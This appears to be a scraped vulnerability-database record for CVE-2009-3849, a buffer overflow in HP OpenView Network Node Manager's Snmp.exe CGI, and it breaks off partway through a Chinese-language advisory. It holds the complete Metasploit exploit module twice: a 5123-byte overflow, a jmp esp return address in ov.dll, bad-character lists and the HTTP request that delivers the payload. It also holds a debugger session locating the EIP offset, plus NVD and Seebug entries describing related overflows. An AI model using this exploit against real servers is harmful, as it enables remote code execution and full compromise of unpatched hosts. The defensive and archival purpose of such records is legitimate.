\n[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Dec 9 2009')) \n \nregister_options( [ Opt::RPORT(80) ], self.class ) \n \nend \n \ndef exploit \n \nsploit = rand_text_alpha_upper(5123) + [target.ret].pack('V') + payload.encoded \n \nprint_status(\"Trying target #{target.name}...\") \n \nsend_request_cgi({ \n'uri' => \"/OvCgi/Main/Snmp.exe\", \n'method' => \"GET\", \n'data' => \"Host=&Oid=#{sploit}&Community=&Action=&Context=Snmp\", \n}, 3) \n \nhandler \n \nend \n \nend \n=begin \nSearch for parameter OidSearch for parameter Debug --not found-- \n=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5A \nd6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2 \nAh3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak \n9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5A \no6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2 \nAs3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av \n9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5A \nz6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2 \nBd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg \n9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5B \nk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2 \nBo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br \n9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5B \nv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2 \n.... \nSearch for parameter Debug --not found-- \n(db4.db8): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=00000000 ebx=7ffdf000 ecx=00000000 edx=000fa500 esi=00000000 edi=00000000 \neip=386f4737 esp=000fcdf4 ebp=6f47366f iopl=0 nv up ei pl zr na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 \n386f4737 ?? ??? \n1:014> !load byakugan \n[Byakugan] Successfully loaded! \n1:014> !pattern_offset 9292 \n[Byakugan] Control of ebp at offset 5119. \n[Byakugan] Control of eip at offset 5123. \n1:014> s -b 0x5a000000 0x5a06a000 ff e4 \n5a01d78d ff e4 00 00 83 c4 08 85-c0 75 14 68 18 2f 04 5a .........u.h./.Z \n1:014> u 0x5a01d78d L1 \nov!OVHelpAPI+0x18d: \n5a01d78d ffe4 jmp esp <- jmp esp for 7.53, will update in a sec. \n=end \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/84565/hp_nnm_snmp.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T21:36:26", "description": "Multiple stack-based buffer overflows in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allow remote attackers to execute arbitrary code via (1) a long Template parameter to nnmRptConfig.exe, related to the strcat function; or (2) a long Oid parameter to snmp.exe.", "cvss3": {}, "published": "2009-12-10T22:30:00", "type": "cve", "title": "CVE-2009-3849", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3849"], "modified": "2018-10-10T19:47:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.0.1", "cpe:/a:hp:openview_network_node_manager:7.53", "cpe:/a:hp:openview_network_node_manager:7.51"], "id": "CVE-2009-3849", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3849", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:hp_ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2020-07-19T03:21:27", "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute arbitrary code.\n", "edition": 2, "cvss3": {}, "published": "2009-12-12T20:06:14", "type": "metasploit", "title": "HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3849"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_SNMP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute\n arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-3849' ],\n [ 'OSVDB', '60933' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 650,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 9 2009'))\n end\n\n def exploit\n\n sploit = rand_text_alpha_upper(5123) + [target.ret].pack('V') + payload.encoded\n\n print_status(\"Trying target #{target.name}...\")\n\n send_request_cgi({\n 'uri'\t\t=> \"/OvCgi/Main/Snmp.exe\",\n 'method'\t=> \"GET\",\n 'data'\t\t=> \"Host=&Oid=#{sploit}&Community=&Action=&Context=Snmp\",\n }, 3)\n\n handler\n\n end\n\nend\n=begin\nSearch for parameter OidSearch for parameter Debug --not found--\n=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5A\nd6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2\nAh3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak\n9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5A\no6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2\nAs3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av\n9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5A\nz6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2\nBd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg\n9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5B\nk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2\nBo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br\n9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5B\nv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2\n....\nSearch for parameter Debug --not found--\n(db4.db8): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=00000000 ebx=7ffdf000 ecx=00000000 edx=000fa500 esi=00000000 edi=00000000\neip=386f4737 esp=000fcdf4 ebp=6f47366f iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246\n386f4737 ?? ???\n1:014> !load byakugan\n[Byakugan] Successfully loaded!\n1:014> !pattern_offset 9292\n[Byakugan] Control of ebp at offset 5119.\n[Byakugan] Control of eip at offset 5123.\n1:014> s -b 0x5a000000 0x5a06a000 ff e4\n5a01d78d ff e4 00 00 83 c4 08 85-c0 75 14 68 18 2f 04 5a .........u.h./.Z\n1:014> u 0x5a01d78d L1\nov!OVHelpAPI+0x18d:\n5a01d78d ffe4 jmp esp <- jmp esp for 7.53, will update in a sec.\n=end\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_snmp.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:31:48", "description": "HP OpenView Network Node Manager\u662f\u4e00\u6b3eHP\u516c\u53f8\u5f00\u53d1\u548c\u7ef4\u62a4\u7684\u7f51\u7edc\u7ba1\u7406\u7cfb\u7edf\u8f6f\u4ef6\uff0c\u5177\u6709\u5f3a\u5927\u7684\u7f51\u7edc\u8282\u70b9\u7ba1\u7406\u529f\u80fd\u3002\r\nHP OpenView Network Node Manager\u5b58\u5728\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff1a\r\nCVE-2009-3845\uff1a\r\nCNCVE ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\n \r\nNetwork Node Manager (NNM)\u5206\u53d1\u7684PERL CGI\u53ef\u6267\u884c\u7a0b\u5e8f\u5b58\u5728\u7f3a\u9677\uff0c\u5e94\u7528\u7a0b\u5e8f\u4e0d\u6b63\u786e\u8fc7\u6ee4\u63d0\u4ea4\u7ed9\u76d1\u542cTCP 3443\u7aef\u53e3\u7684NNM HTTP\u670d\u52a1\u5668\u7684hostname HTTP\u53d8\u91cf\uff0c\u901a\u8fc7\u63d0\u4f9b\u7ba1\u9053\u64cd\u4f5c\u7b26\uff0c\u6076\u610f\u653b\u51fb\u8005\u53ef\u4ee5\u6ce8\u5165\u4efb\u610f\u547d\u4ee4\u5e76\u5728\u8fdc\u7a0b\u670d\u52a1\u5668\u4e0a\u6267\u884c\u3002\r\nCVE-2009-3849\uff1a\r\nCNCVE ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\nCNCVE-20093849\r\n \r\nnnmRptConfig.exe CGI\u53ef\u6267\u884c\u7a0b\u5e8f\u53ef\u901a\u8fc7\u76d1\u542c\u572880\u7aef\u53e3\u7684IIS WEB\u670d\u52a1\u5668\u8bbf\u95ee\uff0c\u5f53\u89e3\u6790POST\u53d8\u91cf\u65f6\uff0c\u8fdb\u7a0b\u4f7f\u7528strcat\u8c03\u7528\u62f7\u8d1dTemplate\u53c2\u6570\u5230\u56fa\u5b9a\u6808\u7f13\u51b2\u533a\u5927\u5c0f\uff0c\u63d0\u4f9b\u8d85\u5927\u503c\u53ef\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\u5e76\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\nCVE-2009-3848\uff1a\r\nCNCVE ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\nCNCVE-20093849\r\nCNCVE-20093848\r\n \r\nnnmRptConfig.exe CGI\u53ef\u6267\u884c\u7a0b\u5e8f\u53ef\u901a\u8fc7\u76d1\u542c\u572880\u7aef\u53e3\u7684IIS WEB\u670d\u52a1\u5668\u8bbf\u95ee\uff0c\u5f53\u89e3\u6790POST\u53d8\u91cf\u65f6\uff0c\u8fdb\u7a0b\u4f7f\u7528vsprintf()\u8c03\u7528\u62f7\u8d1dTemplate\u53c2\u6570\u5230\u56fa\u5b9a\u6808\u7f13\u51b2\u533a\u5927\u5c0f\uff0c\u63d0\u4f9b\u8d85\u5927\u503c\u53ef\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\u5e76\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\nCVE-2009-3849\uff1a\r\nCNCVE ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20093849\r\n \r\nsnmp.exe CGI\u53ef\u6267\u884c\u7a0b\u5e8f\u53ef\u901a\u8fc7\u76d1\u542c\u572880\u7aef\u53e3\u7684IIS WEB\u670d\u52a1\u5668\u8bbf\u95ee\uff0c\u5f53\u89e3\u6790POST\u53d8\u91cf\u65f6\uff0c\u8fdb\u7a0b\u4f7f\u7528sprintf()\u8c03\u7528\u62f7\u8d1dOid\u53c2\u6570\u5230\u56fa\u5b9a\u6808\u7f13\u51b2\u533a\u5927\u5c0f\uff0c\u63d0\u4f9b\u8d85\u5927\u503c\u53ef\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\u5e76\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\nCVE-2009-4179\uff1a\r\nCNCVE ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20093849\r\nCNCVE-20094179\r\n \r\novalarm.exe CGI\u5e94\u7528\u7a0b\u5e8f\u5b58\u5728\u7f3a\u9677\uff0c\u5982\u679c\u8bbe\u7f6e\u4e86OVABverbose POST\u53d8\u91cf\uff0c\u8fdb\u7a0b\u4f1a\u83b7\u53d6Accept-Language HTTP\u5934\u5b57\u6bb5\u7684\u503c\u5e76\u6ca1\u6709\u4efb\u4f55\u957f\u5ea6\u68c0\u67e5\u5c31\u62f7\u8d1d\u52300x100\u5b57\u8282\u6808\u7f13\u51b2\u533a\uff0c\u63d0\u4f9b\u8d85\u957f\u5b57\u7b26\u4e32\u53ef\u6ea2\u51fa\u7f13\u51b2\u533a\uff0c\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\nCVE-2009-3846\uff1a\r\nCNCVE ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20093849\r\nCNCVE-20094179\r\nCNCVE-20093846\r\n \r\novlogin.exe CGI\u5e94\u7528\u7a0b\u5e8f\u5b58\u5728\u7f3a\u9677\uff0c\u5728\u9a8c\u8bc1\u8fc7\u7a0b\u4e2duserid\u548cpasswd post\u53d8\u91cf\u4f1a\u4f20\u9012\u7ed9\u8fd9\u4e2aCGI\uff0c\u5e76\u901a\u8fc7sprintf()\u8c03\u7528\u62f7\u8d1d\u5230\u9759\u60010x100\u5b57\u8282\u5806\u7f13\u51b2\u533a\uff0c\u63d0\u4f9b\u8d85\u957f\u5b57\u7b26\u4e32\u53ef\u6ea2\u51fa\u8fd9\u4e2a\u7f13\u51b2\u533a\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\nCVE-2009-4176\uff1a\r\nCNCVE ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20093849\r\nCNCVE-20094179\r\nCNCVE-20093846\r\nCNCVE-20094176\r\n \r\novsessionmgr.exe\u5e94\u7528\u7a0b\u5e8f\u5b58\u5728\u7f3a\u9677\uff0c\u4f1a\u8bdd\u7ba1\u7406\u5668\u4eceovlogin.exe CGI\u5e94\u7528\u7a0b\u5e8f\u53d1\u9001\u7684POST\u53d8\u91cf\u4e2d\u83b7\u53d6\u51ed\u8bc1\u4fe1\u606f\uff0c'userid'\u548c'passwd'\u53d8\u91cf\u901a\u8fc7sprintf()\u8c03\u7528\u62f7\u8d1d\u5230\u9759\u60010x100\u5b57\u8282\u5806\u7f13\u51b2\u533a\uff0c\u63d0\u4f9b\u8d85\u957f\u5b57\u7b26\u4e32\u53ef\u6ea2\u51fa\u8fd9\u4e2a\u7f13\u51b2\u533a\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\nCVE-2009-4178\uff1a\r\nCNCVE ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20093849\r\nCNCVE-20094179\r\nCNCVE-20093846\r\nCNCVE-20094176\r\nCNCVE-20094178\r\n \r\nOvWebHelp.exe CGI\u5e94\u7528\u7a0b\u5e8f\u5b58\u5728\u7f3a\u9677\uff0c\u5728\u5b57\u7b26\u4e32\u4e32\u8054\u8fc7\u7a0b\u4e2d\u3002\u8fdb\u7a0b\u83b7\u53d6Topic POST\u53d8\u91cf\u503c\u5e76\u6ca1\u6709\u4efb\u4f55\u957f\u5ea6\u68c0\u67e5\u62f7\u8d1d\u52300x400\u5b57\u8282\u5806\u7f13\u51b2\u533a\u4e2d\uff0c\u63d0\u4f9b\u8d85\u957f\u5b57\u7b26\u4e32\u53ef\u6ea2\u51fa\u8fd9\u4e2a\u7f13\u51b2\u533a\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\nCVE-2009-4181\uff1a\r\nCNCVE ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20093849\r\nCNCVE-20094179\r\nCNCVE-20093846\r\nCNCVE-20094176\r\nCNCVE-20094178\r\nCNCVE-20094181\r\n \r\njovgraph.exe CGI\u5e94\u7528\u7a0b\u5e8f\u63a5\u6536\u5230\u8bf7\u6c42\u65f6\u4f1a\u542f\u7528ovwebsnmpsrv.exe\u5e94\u7528\u7a0b\u5e8f\uff0covwebsnmpsrv.exe\u5e94\u7528\u7a0b\u5e8f\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdb\u7a0b\u4f1a\u62f7\u8d1d'sel' POST\u53d8\u91cf\u5185\u5bb9\u4ee5\u7528\u6237\u53ef\u63a7\u7684\u6b21\u6570\u62f7\u8d1d\u6570\u636e\u5230\u9759\u6001\u6808\u7f13\u51b2\u533a\u4e2d\uff0c\u901a\u8fc7\u91cd\u590d\u7279\u5b9a\u5b57\u7b26\u4e32\u4f5c\u4e3a'arg' POST\u53d8\u91cf\u5185\u5bb9\uff0c\u53ef\u6ea2\u51fa\u6b64\u7f13\u51b2\u533a\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\nCVE-2009-4180\uff1a\r\nCNCVE ID\uff1aCNCVE-20090898\r\nCNCVE-20093845\r\nCNCVE-20093846\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20094176\r\nCNCVE-20094177\r\nCNCVE-20094178\r\nCNCVE-20094179\r\nCNCVE-20094180\r\nCNCVE-20094181\r\nCNCVE-20093847\r\nCNCVE-20093845\r\nCNCVE-20093849\r\nCNCVE-20093848\r\nCNCVE-20093849\r\nCNCVE-20094179\r\nCNCVE-20093846\r\nCNCVE-20094176\r\nCNCVE-20094178\r\nCNCVE-20094181\r\nCNCVE-20094180\r\n \r\nsnmpviewer.exe CGI\u5e94\u7528\u7a0b\u5e8f\u5b58\u5728\u8bbe\u8ba1\u7f3a\u9677\uff0c\u8fdb\u7a0b\u4f7f\u7528strcat\u8c03\u7528\u628aHTTP\u8bf7\u6c42\u4e2d\u7684HOST\u5934\u5b57\u6bb5\u6570\u636e\u62f7\u8d1d\u5230\u56fa\u5b9a\u957f\u5ea6\u7684\u7f13\u51b2\u533a\u4e2d\uff0c\u63d0\u4f9b\u8d85\u957f\u5b57\u7b26\u4e32\u53ef\u6ea2\u51fa\u8fd9\u4e2a\u7f13\u51b2\u533a\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\nCVE-2009-4177\uff1a\r\nCNCVE 